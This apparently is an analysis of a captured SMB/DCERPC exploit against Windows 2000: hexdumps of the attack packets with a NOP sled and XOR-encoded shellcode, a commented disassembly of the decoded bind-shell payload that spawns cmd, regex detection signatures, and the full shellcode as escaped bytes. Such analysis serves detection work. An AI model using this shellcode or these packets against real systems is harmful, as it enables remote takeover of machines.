hexdump
00000000 00 00 00 a4 ff 53 4d 42 73 00 00 00 00 18 07 c8 |...€ÿSMBs......È|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe |..............ÿþ|
00000020 00 00 10 00 0c ff 00 a4 00 04 11 0a 00 00 00 00 |.....ÿ.€........|
00000030 00 00 00 20 00 00 00 00 00 d4 00 00 80 69 00 4e |... .....Ô...i.N|
00000040 54 4c 4d 53 53 50 00 01 00 00 00 97 82 08 e0 00 |TLMSSP........à.|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 |W.i.n.d.o.w.s. .|
00000070 32 00 30 00 30 00 30 00 20 00 32 00 31 00 39 00 |2.0.0.0. .2.1.9.|
00000080 35 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 |5...W.i.n.d.o.w.|
00000090 73 00 20 00 32 00 30 00 30 00 30 00 20 00 35 00 |s. .2.0.0.0. .5.|
000000a0 2e 00 30 00 00 00 00 00 00 00 00 da ff 53 4d 42 |..0........ÚÿSMB|
000000b0 73 00 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 |s......È........|
000000c0 00 00 00 00 00 00 ff fe 00 08 20 00 0c ff 00 da |......ÿþ.. ..ÿ.Ú|
000000d0 00 04 11 0a 00 00 00 00 00 00 00 57 00 00 00 00 |...........W....|
000000e0 00 d4 00 00 80 9f 00 4e 54 4c 4d 53 53 50 00 03 |.Ô.....NTLMSSP..|
000000f0 00 00 00 01 00 01 00 46 00 00 00 00 00 00 00 47 |.......F.......G|
00000100 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 |.......@.......@|
00000110 00 00 00 06 00 06 00 40 00 00 00 10 00 10 00 47 |.......@.......G|
00000120 00 00 00 15 8a 88 e0 48 00 4f 00 44 00 00 ed 41 |......àH.O.D..íA|
00000130 2c 27 86 26 d2 59 a0 b3 5e aa 00 88 6f c5 57 00 |,'.&ÒY ³^ª..oÅW.|
00000140 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 32 00 |i.n.d.o.w.s. .2.|
00000150 30 00 30 00 30 00 20 00 32 00 31 00 39 00 35 00 |0.0.0. .2.1.9.5.|
00000160 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 |..W.i.n.d.o.w.s.|
00000170 20 00 32 00 30 00 30 00 30 00 20 00 35 00 2e 00 | .2.0.0.0. .5...|
00000180 30 00 00 00 00 00 00 00 00 5c ff 53 4d 42 75 00 |0........\ÿSMBu.|
00000190 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 |.....È..........|
000001a0 00 00 00 00 ff fe 00 08 30 00 04 ff 00 5a 00 08 |....ÿþ..0..ÿ.Z..|
000001b0 00 01 00 31 00 00 5c 00 5c 00 31 00 39 00 32 00 |...1..\.\.1.9.2.|
000001c0 2e 00 33 00 35 00 2e 00 32 00 32 00 39 00 2e 00 |..3.5...2.2.9...|
000001d0 34 00 35 00 5c 00 49 00 50 00 43 00 24 00 00 00 |4.5.\.I.P.C.$...|
000001e0 3f 3f 3f 3f 3f 00 00 00 00 66 ff 53 4d 42 a2 00 |?????....fÿSMB¢.|
000001f0 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 |.....È..........|
00000200 00 00 00 08 78 04 00 08 40 00 18 ff 00 de de 00 |....x...@..ÿ.ÞÞ.|
00000210 10 00 16 00 00 00 00 00 00 00 9f 01 02 00 00 00 |................|
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 |................|
00000230 00 00 40 00 00 00 02 00 00 00 03 13 00 00 5c 00 |..@...........\.|
00000240 62 00 72 00 6f 00 77 00 73 00 65 00 72 00 00 00 |b.r.o.w.s.e.r...|
00000250 00 00 00 9c ff 53 4d 42 25 00 00 00 00 18 07 c8 |....ÿSMB%......È|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 |..............x.|
00000270 00 08 50 00 10 00 00 48 00 00 00 00 10 00 00 00 |..P....H........|
00000280 00 00 00 00 00 00 00 00 00 54 00 48 00 54 00 02 |.........T.H.T..|
00000290 00 26 00 00 40 59 00 00 5c 00 50 00 49 00 50 00 |.&..@Y..\.P.I.P.|
000002a0 45 00 5c 00 00 00 40 00 05 00 0b 03 10 00 00 00 |E.\...@.........|
000002b0 48 00 00 00 01 00 00 00 b8 10 b8 10 00 00 00 00 |H.......ž.ž.....|
000002c0 01 00 00 00 00 00 01 00 40 4e 9f 8d 3d a0 ce 11 |........@N..= Î.|
000002d0 8f 69 08 00 3e 30 05 1b 01 00 00 00 04 5d 88 8a |.i..>0.......]..|
000002e0 eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 |ë.É..è..+.H`....|
000002f0 00 00 08 90 ff 53 4d 42 25 00 00 00 00 18 07 c8 |....ÿSMB%......È|
00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 |..............x.|
00000310 00 08 60 00 10 00 00 3c 08 00 00 00 01 00 00 00 |..`....<........|
00000320 00 00 00 00 00 00 00 00 00 54 00 3c 08 54 00 02 |.........T.<.T..|
00000330 00 26 00 00 40 4d 08 00 5c 00 50 00 49 00 50 00 |.&..@M..\.P.I.P.|
00000340 45 00 5c 00 00 00 40 00 05 00 00 03 10 00 00 00 |E.\...@.........|
00000350 3c 08 00 00 01 00 00 00 24 08 00 00 00 00 36 00 |<.......$.....6.|
00000360 11 00 00 00 00 00 00 00 11 00 00 00 52 00 4f 00 |............R.O.|
00000370 4f 00 54 00 5c 00 53 00 59 00 53 00 54 00 45 00 |O.T.\.S.Y.S.T.E.|
00000380 4d 00 5c 00 30 00 30 00 30 00 30 00 00 00 00 00 |M.\.0.0.0.0.....|
00000390 ff ff 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 |ÿÿ..à...........|
000003a0 c0 07 00 00 00 00 00 00 90 90 90 90 90 90 90 90 |À...............|
000003b0 eb 08 90 90 67 15 7a 76 eb 08 90 90 67 15 7a 76 |ë...g.zvë...g.zv|
*
00000400 90 90 90 90 90 90 90 eb 08 90 90 48 4f 44 88 90 |.......ë...HOD..|
00000410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000420 31 c9 83 e9 b0 d9 ee d9 74 24 f4 5b 81 73 13 02 |1É.é°ÙîÙt$ô[.s..|
00000430 eb 6f 15 83 eb fc e2 f4 fe 81 84 58 ea 12 90 ea |ëo..ëüâôþ..Xê..ê|
00000440 fd 8b e4 79 26 cf e4 50 3e 60 13 10 7a ea 80 9e |ý.äy&ÏäP>`..zê..|
00000450 4d f3 e4 4a 22 ea 84 5c 89 df e4 14 ec da af 8c |MóäJ"ê.\.ßä.ìÚ¯.|
00000460 ae 6f af 61 05 2a a5 18 03 29 84 e1 39 bf 4b 3d |®o¯a.*¥..).á9¿K=|
00000470 77 0e e4 4a 26 ea 84 73 89 e7 24 9e 5d f7 6e fe |w.äJ&ê.s.ç$.]÷nþ|
00000480 01 c7 e4 9c 6e cf 73 74 c1 da b4 71 89 a8 5f 9e |.Çä.nÏstÁÚŽq.š_.|
00000490 42 e7 e4 65 1e 46 e4 55 0a b5 07 9b 4c e5 83 45 |Bçäe.FäU.µ..Lå.E|
000004a0 fd 3d 09 46 64 83 5c 27 6a 9c 1c 27 5d bf 90 c5 |ý=.Fd.\'j..']¿.Å|
000004b0 6a 20 82 e9 39 bb 90 c3 5d 62 8a 73 83 06 67 17 |j .é9».Ã]b.s..g.|
000004c0 57 81 6d ea d2 83 b6 1c f7 46 38 ea d4 b8 3c 46 |W.mêÒ.¶.÷F8êÔž<F|
000004d0 51 b8 2c 46 41 b8 90 c5 64 83 4d ad 64 b8 e6 f4 |Qž,FAž.Åd.Mdžæô|
000004e0 97 83 cb 0f 72 2c 38 ea d4 81 7f 44 57 14 bf 7d |..Ë.r,8êÔ..DW.¿}|
000004f0 a6 46 41 fc 55 14 b9 46 57 14 bf 7d e7 a2 e9 5c |ŠFAüU.¹FW.¿}ç¢é\|
00000500 55 14 b9 45 56 bf 3a ea d2 78 07 f2 7b 2d 16 42 |U.¹EV¿:êÒx.ò{-.B|
00000510 fd 3d 3a ea d2 8d 05 71 64 83 0c 78 8b 0e 05 45 |ý=:êÒ..qd..x...E|
00000520 5b c2 a3 9c e5 81 2b 9c e0 da af e6 a8 15 2d 38 |[£.å.+.àÚ¯æš.-8|
00000530 fc a9 43 86 8f 91 57 be a9 40 07 67 fc 58 79 ea |ü©C...WŸ©@.güXyê|
00000540 77 af 90 c3 59 bc 3d 44 53 ba 05 14 53 ba 3a 44 |w¯.ÃYŒ=DSº..Sº:D|
00000550 fd 3b 07 b8 db ee a1 46 fd 3d 05 ea fd dc 90 c5 |ý;.žÛî¡Fý=.êýÜ.Å|
00000560 89 bc 93 96 c6 8f 90 c3 50 14 bf 7d ed 25 8f 75 |.Œ..Æ..ÃP.¿}í%.u|
00000570 51 14 b9 ea d2 eb 6f 15 90 90 90 90 90 90 90 90 |Q.¹êÒëo.........|
00000580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000b70 90 90 90 90 90 90 90 90 e0 07 00 00 04 00 00 00 |........à.......|
00000b80 00 00 00 00 |....|
00000b84
00000000 00 00 00 a4 ff 53 4d 42 73 00 00 00 00 18 07 c8 |...€ÿSMBs......È| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe |..............ÿþ| 00000020 00 00 10 00 0c ff 00 a4 00 04 11 0a 00 00 00 00 |.....ÿ.€........| 00000030 00 00 00 20 00 00 00 00 00 d4 00 00 80 69 00 4e |... .....Ô...i.N| 00000040 54 4c 4d 53 53 50 00 01 00 00 00 97 82 08 e0 00 |TLMSSP........à.| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000060 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 |W.i.n.d.o.w.s. .| 00000070 32 00 30 00 30 00 30 00 20 00 32 00 31 00 39 00 |2.0.0.0. .2.1.9.| 00000080 35 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 |5...W.i.n.d.o.w.| 00000090 73 00 20 00 32 00 30 00 30 00 30 00 20 00 35 00 |s. .2.0.0.0. .5.| 000000a0 2e 00 30 00 00 00 00 00 00 00 00 da ff 53 4d 42 |..0........ÚÿSMB| 000000b0 73 00 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 |s......È........| 000000c0 00 00 00 00 00 00 ff fe 00 08 20 00 0c ff 00 da |......ÿþ.. ..ÿ.Ú| 000000d0 00 04 11 0a 00 00 00 00 00 00 00 57 00 00 00 00 |...........W....| 000000e0 00 d4 00 00 80 9f 00 4e 54 4c 4d 53 53 50 00 03 |.Ô.....NTLMSSP..| 000000f0 00 00 00 01 00 01 00 46 00 00 00 00 00 00 00 47 |.......F.......G| 00000100 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 |.......@.......@| 00000110 00 00 00 06 00 06 00 40 00 00 00 10 00 10 00 47 |.......@.......G| 00000120 00 00 00 15 8a 88 e0 48 00 4f 00 44 00 00 ed 41 |......àH.O.D..íA| 00000130 2c 27 86 26 d2 59 a0 b3 5e aa 00 88 6f c5 57 00 |,'.&ÒY ³^ª..oÅW.| 00000140 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 32 00 |i.n.d.o.w.s. .2.| 00000150 30 00 30 00 30 00 20 00 32 00 31 00 39 00 35 00 |0.0.0. .2.1.9.5.| 00000160 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 |..W.i.n.d.o.w.s.| 00000170 20 00 32 00 30 00 30 00 30 00 20 00 35 00 2e 00 | .2.0.0.0. .5...| 00000180 30 00 00 00 00 00 00 00 00 5c ff 53 4d 42 75 00 |0........\ÿSMBu.| 00000190 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 |.....È..........| 000001a0 00 00 00 00 ff fe 00 08 30 00 04 ff 00 5a 00 08 |....ÿþ..0..ÿ.Z..| 000001b0 00 01 00 31 00 00 5c 00 5c 00 31 00 39 00 32 00 |...1..\.\.1.9.2.| 000001c0 2e 00 33 00 35 00 2e 00 32 00 32 00 39 00 2e 00 |..3.5...2.2.9...| 000001d0 34 00 35 00 5c 00 49 00 50 00 43 00 24 00 00 00 |4.5.\.I.P.C.$...| 000001e0 3f 3f 3f 3f 3f 00 00 00 00 66 ff 53 4d 42 a2 00 |?????....fÿSMB¢.| 000001f0 00 00 00 18 07 c8 00 00 00 00 00 00 00 00 00 00 |.....È..........| 00000200 00 00 00 08 78 04 00 08 40 00 18 ff 00 de de 00 |....x...@..ÿ.ÞÞ.| 00000210 10 00 16 00 00 00 00 00 00 00 9f 01 02 00 00 00 |................| 00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 |................| 00000230 00 00 40 00 00 00 02 00 00 00 03 13 00 00 5c 00 |..@...........\.| 00000240 62 00 72 00 6f 00 77 00 73 00 65 00 72 00 00 00 |b.r.o.w.s.e.r...| 00000250 00 00 00 9c ff 53 4d 42 25 00 00 00 00 18 07 c8 |....ÿSMB%......È| 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 |..............x.| 00000270 00 08 50 00 10 00 00 48 00 00 00 00 10 00 00 00 |..P....H........| 00000280 00 00 00 00 00 00 00 00 00 54 00 48 00 54 00 02 |.........T.H.T..| 00000290 00 26 00 00 40 59 00 00 5c 00 50 00 49 00 50 00 |.&..@Y..\.P.I.P.| 000002a0 45 00 5c 00 00 00 40 00 05 00 0b 03 10 00 00 00 |E.\...@.........| 000002b0 48 00 00 00 01 00 00 00 b8 10 b8 10 00 00 00 00 |H.......ž.ž.....| 000002c0 01 00 00 00 00 00 01 00 40 4e 9f 8d 3d a0 ce 11 |........@N..= Î.| 000002d0 8f 69 08 00 3e 30 05 1b 01 00 00 00 04 5d 88 8a |.i..>0.......]..| 000002e0 eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 |ë.É..è..+.H`....| 000002f0 00 00 08 90 ff 53 4d 42 25 00 00 00 00 18 07 c8 |....ÿSMB%......È| 00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 |..............x.| 00000310 00 08 60 00 10 00 00 3c 08 00 00 00 01 00 00 00 |..`....<........| 00000320 00 00 00 00 00 00 00 00 00 54 00 3c 08 54 00 02 |.........T.<.T..| 00000330 00 26 00 00 40 4d 08 00 5c 00 50 00 49 00 50 00 |.&..@M..\.P.I.P.| 00000340 45 00 5c 00 00 00 40 00 05 00 00 03 10 00 00 00 |E.\...@.........| 00000350 3c 08 00 00 01 00 00 00 24 08 00 00 00 00 36 00 |<.......$.....6.| 00000360 11 00 00 00 00 00 00 00 11 00 00 00 52 00 4f 00 |............R.O.| 00000370 4f 00 54 00 5c 00 53 00 59 00 53 00 54 00 45 00 |O.T.\.S.Y.S.T.E.| 00000380 4d 00 5c 00 30 00 30 00 30 00 30 00 00 00 00 00 |M.\.0.0.0.0.....| 00000390 ff ff 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 |ÿÿ..à...........| 000003a0 c0 07 00 00 00 00 00 00 90 90 90 90 90 90 90 90 |À...............| 000003b0 eb 08 90 90 67 15 7a 76 eb 08 90 90 67 15 7a 76 |ë...g.zvë...g.zv| * 00000400 90 90 90 90 90 90 90 eb 08 90 90 48 4f 44 88 90 |.......ë...HOD..| 00000410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000420 31 c9 83 e9 b0 d9 ee d9 74 24 f4 5b 81 73 13 02 |1É.é°ÙîÙt$ô[.s..| 00000430 eb 6f 15 83 eb fc e2 f4 fc 6a eb 4d e8 f9 ff ff |ëo..ëüâôüjëMèùÿÿ| 00000440 ff 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b |ÿ`.l$$.E<.|.x.ï.| 00000450 4f 18 8b 5f 20 01 eb 49 8b 34 8b 01 ee 31 c0 99 |O.._ .ëI.4..î1À.| 00000460 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 |¬.Àt.ÁÊ..Âëô;T$(| 00000470 75 e5 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb |uå._$.ëf..K._..ë| 00000480 03 2c 8b 89 6c 24 1c 61 c3 31 db 64 8b 43 30 8b |.,..l$.aÃ1Ûd.C0.| 00000490 40 0c 8b 70 1c ad 8b 40 08 5e 68 8e 4e 0e ec 50 |@..p..@.^h.N.ìP| 000004a0 ff d6 66 53 66 68 33 32 68 77 73 32 5f 54 ff d0 |ÿÖfSfh32hws2_TÿÐ| 000004b0 68 cb ed fc 3b 50 ff d6 5f 89 e5 66 81 ed 08 02 |hËíü;PÿÖ_.åf.í..| 000004c0 55 6a 02 ff d0 68 d9 09 f5 ad 57 ff d6 53 53 53 |Uj.ÿÐhÙ.õWÿÖSSS| 000004d0 53 53 43 53 43 53 ff d0 66 68 22 b8 66 53 89 e1 |SSCSCSÿÐfh"žfS.á| 000004e0 95 68 a4 1a 70 c7 57 ff d6 6a 10 51 55 ff d0 68 |.h€.pÇWÿÖj.QUÿÐh| 000004f0 a4 ad 2e e9 57 ff d6 53 55 ff d0 68 e5 49 86 49 |€.éWÿÖSUÿÐhåI.I| 00000500 57 ff d6 50 54 54 55 ff d0 93 68 e7 79 c6 79 57 |WÿÖPTTUÿÐ.hçyÆyW| 00000510 ff d6 55 ff d0 66 6a 64 66 68 63 6d 89 e5 6a 50 |ÿÖUÿÐfjdfhcm.åjP| 00000520 59 29 cc 89 e7 6a 44 89 e2 31 c0 f3 aa fe 42 2d |Y)Ì.çjD.â1ÀóªþB-| 00000530 fe 42 2c 93 8d 7a 38 ab ab ab 68 72 fe b3 16 ff |þB,..z8«««hrþ³.ÿ| 00000540 75 44 ff d6 5b 57 52 51 51 51 6a 01 51 51 55 51 |uDÿÖ[WRQQQj.QQUQ| 00000550 ff d0 68 ad d9 05 ce 53 ff d6 6a ff ff 37 ff d0 |ÿÐhÙ.ÎSÿÖjÿÿ7ÿÐ| 00000560 8b 57 fc 83 c4 64 ff d6 52 ff d0 68 ef ce e0 60 |.Wü.ÄdÿÖRÿÐhïÎà`| 00000570 53 ff d6 ff d0 00 00 00 90 90 90 90 90 90 90 90 |SÿÖÿÐ...........| 00000580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000b70 90 90 90 90 90 90 90 90 e0 07 00 00 04 00 00 00 |........à.......| 00000b80 00 00 00 00 |....| 00000b84
00000420 xor ecx, ecx 00000422 sub ecx, 0FFFFFFB0h 00000425 fldz 00000427 fnstenv byte ptr [esp-0Ch] 0000042B pop ebx 0000042C 0000042C loc_42C: 0000042C xor dword ptr [ebx+13h], 156FEB02h 00000433 sub ebx, 0FFFFFFFCh 00000436 loop loc_42C
00000438 cld 00000438 ; --------------------------------------------------------------------------- 00000439 db 6Ah ; j 0000043A ; --------------------------------------------------------------------------- 0000043A 0000043A loc_43A: 0000043A jmp short loc_489 0000043C ; --------------------------------------------------------------------------- 0000043C call loc_43A 00000441 00000441 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ 00000441 00000441 00000441 sub_441 proc near 00000441 pusha 00000442 mov ebp, [esp+24h] ; ebp=hKernel32 00000446 mov eax, [ebp+3Ch] ; eax=RVA of PE Header of Kernel32 00000449 mov edi, [ebp+eax+78h] ; edi=RVA of ExportTable 0000044D add edi, ebp ; edi=VA of ExportTable 0000044F mov ecx, [edi+18h] 00000452 mov ebx, [edi+20h] ; ebx=RVA of Export Pointer 00000455 add ebx, ebp 00000457 00000457 loc_457: 00000457 dec ecx 00000458 mov esi, [ebx+ecx*4] 0000045B add esi, ebp 0000045D xor eax, eax 0000045F cdq 00000460 00000460 loc_460: 00000460 lodsb 00000461 test al, al 00000463 jz short loc_46C 00000465 ror edx, 0Dh 00000468 add edx, eax 0000046A jmp short loc_460 0000046C ; --------------------------------------------------------------------------- 0000046C 0000046C loc_46C: 0000046C cmp edx, [esp+28h] 00000470 jnz short loc_457 00000472 mov ebx, [edi+24h] 00000475 add ebx, ebp 00000477 mov cx, [ebx+ecx*2] 0000047B mov ebx, [edi+1Ch] 0000047E add ebx, ebp 00000480 add ebp, [ebx+ecx*4] 00000483 mov [esp+1Ch], ebp 00000487 popa 00000488 retn 00000488 sub_441 endp 00000488 00000489 ; --------------------------------------------------------------------------- 00000489 00000489 loc_489: 00000489 xor ebx, ebx 0000048B mov eax, fs:[ebx+30h] 0000048F mov eax, [eax+0Ch] 00000492 mov esi, [eax+1Ch] 00000495 lodsd 00000496 mov eax, [eax+8] 00000499 pop esi ; esi=00000441 0000049A push 0EC0E4E8Eh 0000049F push eax ; eax=hKernel32 000004A0 call esi ; eax=ptrLoadLibrary 000004A2 push bx 000004A4 push small '23' 000004A8 push '_2sw' 000004AD push esp 000004AE call eax ; LoadLibrary (ws2_32) 000004B0 push 3BFCEDCBh ; WSAStartup 000004B5 push eax ; eax=hWS2_32 000004B6 call esi ; esi=00000441 000004B8 pop edi 000004B9 mov ebp, esp 000004BB sub bp, 208h 000004C0 push ebp 000004C1 push 2 000004C3 call eax 000004C5 push 0ADF509D9h ; WSASocketA 000004CA push edi 000004CB call esi ; eax=ptr WSASocketA 000004CD push ebx 000004CE push ebx 000004CF push ebx 000004D0 push ebx 000004D1 push ebx 000004D2 inc ebx 000004D3 push ebx 000004D4 inc ebx 000004D5 push ebx 000004D6 call eax 000004D8 push small 0B822h ; sockaddr.sin_port 000004DC push bx ; sockaddr.sin_family 000004DE mov ecx, esp 000004E0 xchg eax, ebp 000004E1 push 0C7701AA4h ; bind 000004E6 push edi 000004E7 call esi 000004E9 push 10h 000004EB push ecx 000004EC push ebp 000004ED call eax 000004EF push 0E92EADA4h ; listen 000004F4 push edi 000004F5 call esi 000004F7 push ebx 000004F8 push ebp 000004F9 call eax 000004FB push 498649E5h ; accept 00000500 push edi 00000501 call esi 00000503 push eax 00000504 push esp 00000505 push esp 00000506 push ebp 00000507 call eax 00000509 xchg eax, ebx 0000050A push 79C679E7h ; closesocket 0000050F push edi 00000510 call esi 00000512 push ebp 00000513 call eax 00000515 push small 64h 00000518 push small 6D63h 0000051C mov ebp, esp 0000051E push 50h ; 'P' 00000520 pop ecx 00000521 sub esp, ecx 00000523 mov edi, esp 00000525 push 44h ; 'D' 00000527 mov edx, esp 00000529 xor eax, eax 0000052B rep stosb 0000052D inc byte ptr [edx+2Dh] 00000530 inc byte ptr [edx+2Ch] 00000533 xchg eax, ebx 00000534 lea edi, [edx+38h] 00000537 stosd 00000538 stosd 00000539 stosd 0000053A push 16B3FE72h ; CreateProcessA 0000053F push dword ptr [ebp+44h] 00000542 call esi ; eax=ptr CreateProcess 00000544 pop ebx 00000545 push edi 00000546 push edx 00000547 push ecx 00000548 push ecx 00000549 push ecx 0000054A push 1 0000054C push ecx 0000054D push ecx 0000054E push ebp 0000054F push ecx 00000550 call eax 00000552 push 0CE05D9ADh ; WaitForSingleObject 00000557 push ebx 00000558 call esi 0000055A push 0FFFFFFFFh 0000055C push dword ptr [edi] 0000055E call eax 00000560 mov edx, [edi-4] 00000563 add esp, 64h 00000566 call esi 00000568 push edx 00000569 call eax 0000056B push 60E0CEEFh ; ExitThread 00000570 push ebx 00000571 call esi 00000573 call eax
"\\x31\\xC9\\x83\\xE9(.)\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13(....)\\x83" "\\xEB\\xFC\\xE2\\xF4(.*)$"
"\\xFC\\x6A\\xEB\\x4D\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B" "\\x7C\\x05\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\x49\\x8B\\x34\\x8B\\x01" "\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54" "\\x24\\x28\\x75\\xE5\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB" "\\x03\\x2C\\x8B\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xDB\\x64\\x8B\\x43\\x30\\x8B\\x40\\x0C" "\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x66\\x53" "\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50" "\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09" "\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0\\x66\\x68(..)" "\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55\\xFF" "\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55\\xFF\\xD0\\x68\\xE5\\x49\\x86\\x49" "\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57\\xFF\\xD6" "\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89" "\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A" "\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51" "\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6" "\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68" "\\xEF\\xCE\\xE0\\x60\\x53\\xFF\\xD6\\xFF\\xD0"
